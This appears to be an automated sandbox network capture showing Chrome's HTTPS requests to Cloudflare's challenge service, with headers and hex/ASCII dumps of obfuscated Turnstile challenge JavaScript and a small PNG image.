                                                            2025-01-15 16:02:06 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 3a 22 45 72 72 6f 72 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 65 78 70 69 72 65 64 22 3a 22 45 78 70 69 72 65 64 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 6f 6f 74 65 72 5f 70 72 69 76 61 63 79 22 3a 22 50 72 69 76
                                                            Data Ascii: :"Error","testing_only":"Testing%20only.","turnstile_overrun_description":"Stuck%20here%3F","turnstile_expired":"Expired","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_footer_privacy":"Priv
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 2c 67 62 2c 67 6c 2c 67 77 2c 67 41 2c 67 42 2c 67 43 2c 67 47 2c 67 48 2c 65 54 2c 65 55 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 34 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 37 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 38 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 31 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 38 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 39 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 39 39 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74
                                                            Data Ascii: ,gb,gl,gw,gA,gB,gC,gG,gH,eT,eU){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(814))/1+-parseInt(gI(1577))/2*(-parseInt(gI(1528))/3)+-parseInt(gI(531))/4*(-parseInt(gI(858))/5)+-parseInt(gI(1109))/6+parseInt(gI(1399))/7*(parseInt
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 53 6f 66 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 27 6b 66 65 66 64 27 3a 68 32 28 31 37 39 31 29 2c 27 77 53 77 61 67 27 3a 68 32 28 31 34 33 39 29 2c 27 4d 68 67 4e 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 70 45 41 61 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 5a 6d 78 6d 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 67 79 45 4f 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 7c 69 7d 2c 27 6c 4d 64 64 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 65 41 78 73 6f 27 3a 66 75 6e 63 74 69
                                                            Data Ascii: SofJ':function(h,i){return h!==i},'kfefd':h2(1791),'wSwag':h2(1439),'MhgNm':function(h,i){return h==i},'pEAat':function(h,i){return h(i)},'Zmxmc':function(h,i){return h>i},'gyEOj':function(h,i){return h|i},'lMdds':function(h,i){return h<<i},'eAxso':functi
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 52 2c 53 29 7b 69 66 28 68 34 3d 68 32 2c 78 3d 7b 7d 2c 78 5b 68 34 28 31 34 39 34 29 5d 3d 64 5b 68 34 28 31 38 39 33 29 5d 2c 78 5b 68 34 28 31 33 35 38 29 5d 3d 64 5b 68 34 28 36 32 36 29 5d 2c 78 5b 68 34 28 39 38 32 29 5d 3d 68 34 28 31 36 32 37 29 2c 42 3d 78 2c 6e 75 6c 6c 3d 3d 6a 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 44 3d 7b 7d 2c 45 3d 7b 7d 2c 46 3d 27 27 2c 47 3d 32 2c 48 3d 33 2c 49 3d 32 2c 4a 3d 5b 5d 2c 4b 3d 30 2c 4c 3d 30 2c 4d 3d 30 3b 64 5b 68 34 28 31 33 35 30 29 5d 28 4d 2c 6a 5b 68 34 28 31 38 33 31 29 5d 29 3b 4d 2b 3d 31 29 69 66 28 64 5b 68 34 28 31 30 31 34 29 5d 3d 3d 3d 64 5b 68 34 28 31 30 31 34 29 5d 29 7b 69 66 28 4e 3d 6a 5b 68 34 28 31 39 32 34 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 68
                                                            Data Ascii: L,M,N,O,P,R,S){if(h4=h2,x={},x[h4(1494)]=d[h4(1893)],x[h4(1358)]=d[h4(626)],x[h4(982)]=h4(1627),B=x,null==j)return'';for(D={},E={},F='',G=2,H=3,I=2,J=[],K=0,L=0,M=0;d[h4(1350)](M,j[h4(1831)]);M+=1)if(d[h4(1014)]===d[h4(1014)]){if(N=j[h4(1924)](M),Object[h
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 28 35 37 33 29 5d 28 29 7d 2c 31 65 33 29 2c 48 5b 68 34 28 37 31 34 29 5d 5b 68 34 28 31 31 36 32 29 5d 28 42 5b 68 34 28 31 34 39 34 29 5d 2c 49 29 7d 65 6c 73 65 20 53 3d 7b 7d 2c 53 5b 68 34 28 31 34 33 38 29 5d 3d 68 34 28 31 30 35 38 29 2c 53 5b 68 34 28 31 37 34 30 29 5d 3d 4a 5b 68 34 28 31 30 33 33 29 5d 5b 68 34 28 39 39 30 29 5d 2c 53 5b 68 34 28 35 35 39 29 5d 3d 42 5b 68 34 28 31 33 35 38 29 5d 2c 53 5b 68 34 28 39 30 32 29 5d 3d 42 5b 68 34 28 39 38 32 29 5d 2c 49 5b 68 34 28 36 34 31 29 5d 5b 68 34 28 38 34 36 29 5d 28 53 2c 27 2a 27 29 3b 69 66 28 46 21 3d 3d 27 27 29 7b 69 66 28 4f 62 6a 65 63 74 5b 68 34 28 31 31 38 34 29 5d 5b 68 34 28 31 38 35 30 29 5d 5b 68 34 28 35 33 32 29 5d 28 45 2c 46 29 29 7b 69 66 28 32 35 36 3e 46 5b 68 34 28
                                                            Data Ascii: (573)]()},1e3),H[h4(714)][h4(1162)](B[h4(1494)],I)}else S={},S[h4(1438)]=h4(1058),S[h4(1740)]=J[h4(1033)][h4(990)],S[h4(559)]=B[h4(1358)],S[h4(902)]=B[h4(982)],I[h4(641)][h4(846)](S,'*');if(F!==''){if(Object[h4(1184)][h4(1850)][h4(532)](E,F)){if(256>F[h4(
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 30 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 4b 21 3d 46 3b 29 66 6f 72 28 4c 3d 64 5b 68 39 28 36 33 33 29 5d 5b 68 39 28 36 39 30 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 64 5b 68 39 28 31 36 31 39 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4e 3d 64 5b 68 39 28 31 32 36 35 29 5d 28 47 2c 48 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 4a 7c 3d 64 5b 68 39 28 31 36 33 34 29 5d 28 64 5b 68 39 28 31 33 35 30 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 48 3e 3e 3d 31 3b
                                                            Data Ascii: 0)](2,2),F=1;K!=F;)for(L=d[h9(633)][h9(690)]('|'),M=0;!![];){switch(L[M++]){case'0':d[h9(1619)](0,H)&&(H=j,G=o(I++));continue;case'1':N=d[h9(1265)](G,H);continue;case'2':J|=d[h9(1634)](d[h9(1350)](0,N)?1:0,F);continue;case'3':F<<=1;continue;case'4':H>>=1;
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 5d 28 30 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 68 39 28 31 36 31 39 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 68 39 28 31 35 31 30 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 32 28 31 38 35 37 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 54 3d 5b 5d 2c 65 55 3d 30 3b 32 35 36 3e 65 55 3b 65 54 5b 65 55 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 32 36 31 29 5d 28 65 55 29 2c 65 55 2b 2b 29 3b 65 56 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 35 32 33 29 29 2c 65 57 3d 61 74 6f 62 28 67 4a 28 34 39 30 29 29 2c 65 4d 5b 67 4a 28 35 34 36 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 39 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 32 29 7b 69 66 28 69 32 3d 67 4a 2c 65 4d 5b 69 32 28 35 34 36 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 69 32 28 35
                                                            Data Ascii: ](0),x--,E=O,d[h9(1619)](0,x)&&(x=Math[h9(1510)](2,C),C++)}}},g={},g[h2(1857)]=f.h,g}(),eT=[],eU=0;256>eU;eT[eU]=String[gJ(1261)](eU),eU++);eV=(0,eval)(gJ(523)),eW=atob(gJ(490)),eM[gJ(546)]=![],eM[gJ(1965)]=function(i2){if(i2=gJ,eM[i2(546)])return;eM[i2(5
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 5b 69 67 28 31 30 33 33 29 5d 5b 69 67 28 37 36 34 29 5d 2c 27 2f 27 29 2b 65 4d 5b 69 67 28 31 30 33 33 29 5d 2e 63 48 2b 27 2f 27 2b 65 4d 5b 69 67 28 31 30 33 33 29 5d 5b 69 67 28 31 39 32 30 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 47 5b 69 67 28 39 36 38 29 5d 28 6b 5b 69 67 28 31 33 36 30 29 5d 28 27 76 5f 27 2b 65 4d 5b 69 67 28 31 30 33 33 29 5d 5b 69 67 28 37 36 34 29 5d 2b 27 3d 27 2c 43 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 69 67 28 38 33 32 29 5d 3d 65 4d 5b 69 67 28 31 30 33 33 29 5d 5b 69 67 28 38 33 32 29 5d 2c 78 5b 69 67 28 37 39 33 29 5d 3d 65 4d 5b 69 67 28 31 30 33 33 29 5d 5b 69 67 28 37 39 33 29 5d 2c 78 5b 69 67 28 38 30 30 29 5d 3d 65 4d 5b 69 67 28 31 30 33 33
                                                            Data Ascii: [ig(1033)][ig(764)],'/')+eM[ig(1033)].cH+'/'+eM[ig(1033)][ig(1920)];continue;case'4':G[ig(968)](k[ig(1360)]('v_'+eM[ig(1033)][ig(764)]+'=',C));continue;case'5':B=(x={},x[ig(832)]=eM[ig(1033)][ig(832)],x[ig(793)]=eM[ig(1033)][ig(793)],x[ig(800)]=eM[ig(1033
                                                            2025-01-15 16:02:06 UTC1369INData Raw: 48 5a 27 3a 69 68 28 31 30 34 37 29 2c 27 6a 64 72 59 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 4d 56 77 72 74 27 3a 69 68 28 36 31 35 29 7d 2c 65 5b 69 68 28 31 30 36 35 29 5d 28 64 2c 45 72 72 6f 72 29 29 28 66 3d 64 5b 69 68 28 31 38 31 36 29 5d 2c 64 5b 69 68 28 31 39 35 37 29 5d 26 26 74 79 70 65 6f 66 20 64 5b 69 68 28 31 39 35 37 29 5d 3d 3d 3d 69 68 28 31 34 34 32 29 29 26 26 28 6a 3d 64 5b 69 68 28 31 39 35 37 29 5d 5b 69 68 28 36 39 30 29 5d 28 27 5c 6e 27 29 2c 65 5b 69 68 28 35 31 32 29 5d 28 6a 5b 69 68 28 31 38 33 31 29 5d 2c 31 29 29 26 26 28 65 5b 69 68 28 37 37 38 29 5d 28 65 5b 69 68 28 36 39 34 29 5d 2c 69 68 28 31 30 34 37 29 29 3f 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28
                                                            Data Ascii: HZ':ih(1047),'jdrYn':function(n,o,s){return n(o,s)},'MVwrt':ih(615)},e[ih(1065)](d,Error))(f=d[ih(1816)],d[ih(1957)]&&typeof d[ih(1957)]===ih(1442))&&(j=d[ih(1957)][ih(690)]('\n'),e[ih(512)](j[ih(1831)],1))&&(e[ih(778)](e[ih(694)],ih(1047))?(k=/^\s*at\s+(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.1649727104.18.95.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:06 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/09y8e/0x4AAAAAAA5J-xX8Izs2GVzM/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:06 UTC240INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:06 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 902716952f7d72b6-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.1649728104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:06 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:06 UTC240INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:06 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            cache-control: max-age=2629800, public
                                                            Server: cloudflare
                                                            CF-RAY: 90271698ff1c4313-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDRsIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.1649729104.18.94.414436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:06 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90271690994917b5&lang=auto HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:07 UTC331INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 16:02:07 GMT
                                                            Content-Type: application/javascript; charset=UTF-8
                                                            Content-Length: 115676
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 9027169a1cc6727b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:07 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74
                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.privacy_link":"htt
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32
                                                            Data Ascii: s%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%2
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 2c 66 4b 2c 66 56 2c 66 5a 2c 67 32 2c 67 33 2c 67 74 2c 67 75 2c 67 45 2c 67 30 2c 67 31 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 34 33 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 30 38 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 33 39 29 29 2f 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 32 34 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 36 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 32 37 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 34 37 29 29 2f 37 29 2b 2d 70 61 72 73 65
                                                            Data Ascii: ,fK,fV,fZ,g2,g3,gt,gu,gE,g0,g1){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1343))/1+parseInt(gI(1008))/2*(-parseInt(gI(1239))/3)+-parseInt(gI(824))/4*(-parseInt(gI(856))/5)+-parseInt(gI(1527))/6*(-parseInt(gI(1647))/7)+-parse
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 63 74 5b 67 4e 28 31 33 35 34 29 5d 5b 67 4e 28 35 32 31 29 5d 5b 67 4e 28 35 38 33 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 67 4e 28 31 36 30 35 29 5d 28 47 29 7d 7d 2c 65 54 3d 67 4a 28 37 34 36 29 5b 67 4a 28 31 32 39 37 29 5d 28 27 3b 27 29 2c 65 55 3d 65 54 5b 67 4a 28 36 37 34 29 5d 5b 67 4a 28 31 32 32 35 29 5d 28 65 54 29 2c 65 4d 5b 67 4a 28 31 33 33 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 67 51 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 51 3d 67 4a 2c 69 3d 7b 27 56 6f 64 52 49 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 21 3d 3d 6e 7d 2c 27 58 4b 71 45 57 27 3a 67 51 28 37 30 35 29 2c 27 44 41 42 52 48 27 3a 67 51 28 34 34 33 29 2c 27 6e 77 58 48 43 27 3a 67 51 28 36
                                                            Data Ascii: ct[gN(1354)][gN(521)][gN(583)](j,H)||(j[H]=[]),j[H][gN(1605)](G)}},eT=gJ(746)[gJ(1297)](';'),eU=eT[gJ(674)][gJ(1225)](eT),eM[gJ(1331)]=function(g,h,gQ,i,j,k,l,m){for(gQ=gJ,i={'VodRI':function(n,o){return o!==n},'XKqEW':gQ(705),'DABRH':gQ(443),'nwXHC':gQ(6
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 28 65 4d 5b 67 54 28 32 33 38 29 5d 5b 67 54 28 37 35 32 29 5d 28 29 2c 65 4d 5b 67 54 28 32 33 38 29 5d 5b 67 54 28 38 30 31 29 5d 28 29 2c 65 4d 5b 67 54 28 37 32 37 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 67 54 28 33 35 34 29 5d 5b 67 54 28 38 33 35 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 67 54 28 31 32 31 34 29 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 67 54 28 37 30 39 29 5d 5b 67 54 28 33 36 36 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 67 54 28 31 30 37 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 67 54 28 37 30 39 29 5d 5b 67 54 28 31 35 30 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 67 54 28 37 30 39 29 5d 5b 67 54 28 34 30 39 29 5d 2c 27 63 6f 64 65 27 3a 67 54 28 39 35 31 29 2c 27 72 63 56 27 3a 65 4d 5b 67 54 28 37 30 39 29 5d 5b
                                                            Data Ascii: (eM[gT(238)][gT(752)](),eM[gT(238)][gT(801)](),eM[gT(727)]=!![],eM[gT(354)][gT(835)]({'source':gT(1214),'widgetId':eM[gT(709)][gT(366)],'event':e[gT(1072)],'cfChlOut':eM[gT(709)][gT(1507)],'cfChlOutS':eM[gT(709)][gT(409)],'code':gT(951),'rcV':eM[gT(709)][
                                                            2025-01-15 16:02:07 UTC1369INData Raw: 4d 5b 67 55 28 37 30 39 29 5d 5b 67 55 28 34 36 36 29 5d 2b 27 3d 27 2b 44 29 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 33 31 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 67 56 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6f 2c 6b 2c 6c 2c 6d 29 7b 69 66 28 67 56 3d 67 4a 2c 65 3d 7b 27 5a 76 41 4c 50 27 3a 67 56 28 31 32 31 34 29 2c 27 76 43 41 59 68 27 3a 67 56 28 31 34 35 36 29 2c 27 65 4e 4c 6b 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 27 73 4d 4c 6e 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 49 50 57 4d 62 27 3a 67 56 28 34 31 37 29 2c 27 46 58 72 64 53 27 3a 67 56 28 31 36 33 37 29 2c 27 6c 58 49 4b 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f
